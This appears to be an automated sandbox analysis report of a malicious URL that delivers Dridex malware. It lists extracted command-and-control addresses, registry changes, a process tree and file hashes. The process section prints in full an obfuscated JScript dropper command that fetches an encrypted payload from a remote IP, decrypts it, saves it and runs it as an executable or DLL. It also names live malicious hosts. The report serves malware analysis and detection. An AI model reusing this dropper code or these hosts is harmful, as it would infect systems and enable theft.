Analysis
-
max time kernel
70s -
max time network
143s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
01-07-2021 05:48
Static task
static1
URLScan task
urlscan1
Sample
https://exitmagall.xyz/iduew73
Behavioral task
behavioral1
Sample
https://exitmagall.xyz/iduew73
Resource
win7v20210408
General
Malware Config
Extracted
dridex
10111
104.168.155.129:443
142.4.219.173:4664
176.31.117.84:9443
Signatures
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\9ilqj.exe cryptone C:\Users\Admin\AppData\Local\Temp\9ilqj.exe cryptone -
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 25 2152 wscript.exe -
Executes dropped EXE 1 IoCs
Processes:
9ilqj.exepid process 3936 9ilqj.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
9ilqj.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9ilqj.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "331899855" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1177650819" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30895676" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30895676" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1186245752" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7143C6D7-DA2F-11EB-A11C-7280A1B46CD1} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30895676" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "331931847" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1177650819" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "331883262" iexplore.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
iexplore.exepid process 3904 iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 3904 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 3904 iexplore.exe 3904 iexplore.exe 412 IEXPLORE.EXE 412 IEXPLORE.EXE 412 IEXPLORE.EXE 412 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
iexplore.exeIEXPLORE.EXEcmd.exewscript.execmd.exedescription pid process target process PID 3904 wrote to memory of 412 3904 iexplore.exe IEXPLORE.EXE PID 3904 wrote to memory of 412 3904 iexplore.exe IEXPLORE.EXE PID 3904 wrote to memory of 412 3904 iexplore.exe IEXPLORE.EXE PID 412 wrote to memory of 3332 412 IEXPLORE.EXE cmd.exe PID 412 wrote to memory of 3332 412 IEXPLORE.EXE cmd.exe PID 412 wrote to memory of 3332 412 IEXPLORE.EXE cmd.exe PID 3332 wrote to memory of 2152 3332 cmd.exe wscript.exe PID 3332 wrote to memory of 2152 3332 cmd.exe wscript.exe PID 3332 wrote to memory of 2152 3332 cmd.exe wscript.exe PID 2152 wrote to memory of 2704 2152 wscript.exe cmd.exe PID 2152 wrote to memory of 2704 2152 wscript.exe cmd.exe PID 2152 wrote to memory of 2704 2152 wscript.exe cmd.exe PID 2704 wrote to memory of 3936 2704 cmd.exe 9ilqj.exe PID 2704 wrote to memory of 3936 2704 cmd.exe 9ilqj.exe PID 2704 wrote to memory of 3936 2704 cmd.exe 9ilqj.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://exitmagall.xyz/iduew731⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3904 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://45.138.24.31/?Mjk4MDgx&MNNPx&end=twix&start=why&yus=80spinny.127zg59.406q1z8o8&s2hdfgdfgt4=6NbP0zYA0SD2Izfz-3ORZ_xOWPPk7DPRAOzrl-CelzSp_B8JOQFOwLli0HSfwczlIpYUlkV8q-qh0KBzx6c0ZaC9BzbUQhG96LIVLA46A&oafghc1n4=w3_QMvXcJx3QFYPJKfncT&ZkdSDjMTYwOTA=" "2""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://45.138.24.31/?Mjk4MDgx&MNNPx&end=twix&start=why&yus=80spinny.127zg59.406q1z8o8&s2hdfgdfgt4=6NbP0zYA0SD2Izfz-3ORZ_xOWPPk7DPRAOzrl-CelzSp_B8JOQFOwLli0HSfwczlIpYUlkV8q-qh0KBzx6c0ZaC9BzbUQhG96LIVLA46A&oafghc1n4=w3_QMvXcJx3QFYPJKfncT&ZkdSDjMTYwOTA=" "2""4⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c 9ilqj.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\9ilqj.exe9ilqj.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
89b2cc9646a78de14893d414780a853f
SHA1866a2d80b1eb0e821e873430d9962e67fadeff19
SHA2568f5e476d223b4fa079d065225975fea02c5e716cc63048fafb387486f83a3f7b
SHA512811ff553b3e6635fff8dc9a62c1251b2c5c271444cfa2672e1159ffcf98bd62c74056135453f8534bf228eb95b2d7b0fcc04de079db6ea621f9e6e27dd5725e4
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776MD5
b8b651f620bb1c2e89be9b3be78e307a
SHA11a4f54890eb90b63933d3ed5284fc84a6f28167e
SHA2563c665e9dda2dd7673ea723c1e49611af19639982529f58fd44da03500430264d
SHA512f6a7a8452c202a301eb719be18c9458ab4a2dcdb6248238294a787bfd1ca6ab0e0df6c37a9912aafad930ed85770b92b03c8ca99c6409c3f65c6a3345b74c9d2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\A91D2DM4.cookieMD5
2d9862a2f7f5926eb0d94326c779f64a
SHA1fee2e1297f1dfe1abc7eb263cd1a894e0e82ca27
SHA2563f910d4b153df236720e538c46e222344d4835224dd6bfea6c473cf4eefe5a9f
SHA51256ff07fbfb1b12411404bb932a3cc4fa1a81e476a777d36fb31654b1422f3a2152e88dd198fc20160be01edc9cca1e807d4e54b9283d9aa296bdb692afad230d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\MQX7LDGQ.cookieMD5
778e71e3c6b9ceb52140bbff5d896e95
SHA194973e356b5566b09290880103a3f3eff14b361b
SHA2568f8715dbf6a00cee529ca8fa295a2552488c072a535bb4b790587ffa5f35b592
SHA51265716acd610c204c604ee0f1de119d8267af501945575d106124d80a1d970b85b2eea2941f9a8efc1e56bc319d49181f4787ef3b632273fb3c80216041efa4ea
-
C:\Users\Admin\AppData\Local\Temp\3.tMpMD5
60fc00422b399db85f87d41b8328976d
SHA1bb85034acad8025f97e5bb236443debaf8926e4b
SHA256c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA51216fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151
-
C:\Users\Admin\AppData\Local\Temp\9ilqj.exeMD5
d4f2b07163622ec627b822181dacc7de
SHA14cd7f98608e23f0466cd07963a10b14b7f9deca0
SHA256abe0f535bac505b567371572e6babab960e6abead6051340d04560c2f343d31c
SHA5123a35a562cf6fb245dce6917c42fc0d84c913fee6d15c33322842c211fe1b1e6a88b4ceeaca492c50bb877e4926dd6683fd440f91646f4547077236c2e8434eee
-
C:\Users\Admin\AppData\Local\Temp\9ilqj.exeMD5
d4f2b07163622ec627b822181dacc7de
SHA14cd7f98608e23f0466cd07963a10b14b7f9deca0
SHA256abe0f535bac505b567371572e6babab960e6abead6051340d04560c2f343d31c
SHA5123a35a562cf6fb245dce6917c42fc0d84c913fee6d15c33322842c211fe1b1e6a88b4ceeaca492c50bb877e4926dd6683fd440f91646f4547077236c2e8434eee
-
memory/412-115-0x0000000000000000-mapping.dmp
-
memory/2152-117-0x0000000000000000-mapping.dmp
-
memory/2704-119-0x0000000000000000-mapping.dmp
-
memory/3332-116-0x0000000000000000-mapping.dmp
-
memory/3904-114-0x00007FF858480000-0x00007FF8584EB000-memory.dmpFilesize
428KB
-
memory/3936-123-0x0000000000560000-0x000000000059C000-memory.dmpFilesize
240KB
-
memory/3936-124-0x0000000000400000-0x0000000000508000-memory.dmpFilesize
1.0MB
-
memory/3936-120-0x0000000000000000-mapping.dmp